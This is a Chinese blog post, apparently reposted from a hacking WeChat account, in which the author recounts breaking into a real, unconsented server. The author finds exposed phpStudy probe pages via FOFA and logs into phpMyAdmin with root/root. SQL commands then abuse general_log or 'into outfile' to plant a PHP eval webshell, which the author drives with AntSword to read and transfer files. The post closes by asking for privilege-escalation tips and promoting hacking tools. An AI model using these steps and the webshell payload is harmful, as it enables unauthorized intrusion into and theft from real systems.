前提

之前有過幾次實戰getshell了，但是管理員比較敏感，解決不了就下線，趁著這次管理員還沒有下線，趕緊拿出來投個稿。

資訊收集

因為偶然看到了phpstudy探針，所以就去fofa搜尋了一下：

(因為是很久以前的洞了，所以大部分網站都補了，我應該算是撿了個漏)
大概頁面如下：

在這裡，需要注意的是絕對路徑，伺服器作業系統，php版本，ip
絕對路徑:G:/www/index.php
作業系統：Windows NT HB2008 6.1 build 7601
php版本：5.2.17

測試弱口令

弱口令：root/root或者root/空(不過最新的phpmyadmin貌似不允許用root登入)
當我填入root/root時，進行賬號密碼測試：

一看連線到mysql資料庫正常，開心，訪問url/phpmyadmin

同樣用root和root登入上

<h1>檢視當前許可權</h1>
習慣性檢視當前使用者許可權：

1. select user();

一看，漂亮，root許可權，那不是代表我們可以為所欲為？
但是我們需要寫入一句話，那麼需要知道該伺服器是否可以寫入檔案：

1. show variables like '%general%'; #檢視配置

寫入檔案許可權開啟，並且知道了寫入路徑；

補充：
如果不是root那就需要一系列提權操作，社群裡各位大哥講得很詳細，我就不贅述了。
如果原本寫入檔案許可權沒有開啟，就需要讓它開啟，命令如下：

1. set global general_log = on; #開啟general log模式

3. set global general_log_file = '/var/www/html/1.php'; #設定日誌目錄為shell地址

插入一句話木馬

在資訊收集那步(或者通過查詢寫入檔案許可權的時候)，我們已經知道了絕對路徑，就隨便找一個數據庫，插入一句話木馬，如下：

1. select '<?php echo "a";@eval($_POST[a]);?>' into outfile 'G:\\www\\shelll.php';

之後連線直接連線蟻劍：

就這樣，我幾乎可以瀏覽這個電腦上除了c盤以外的盤的所有檔案，並對其進行上傳下載檔案。

後話

大概過了幾天，管理員發現了，於是加了D盾。
shell沒刪，但是許可權極低。只允許在當前的G盤活動
探針沒關，但是寫入檔案會被D盾攔截

一點一點試了之後，發現這個過濾的機制很狗，D盾過濾把select的s換成了_,然後一旦執行除表名之外的查詢就被攔截，也不允許建立庫表之類的。
暫時就止步於此了，對於windows提權我也不是很熟，想知道各位表哥之後怎麼對它進行提權。

我是一坨小海綿，每天吸收一點點~多少多少秒後，我也是個海綿寶寶

學習更多黑客技能！

（掃碼領黑客視訊資料及工具）

本文分享自微信公眾號 - 暗網黑客（HackRead）。
如有侵權，請聯絡 [email protected] 刪除。
本文參與“OSC源創計劃”，歡迎正在閱讀的你也加入，一起分享。

推薦：尚比亞是哪個國家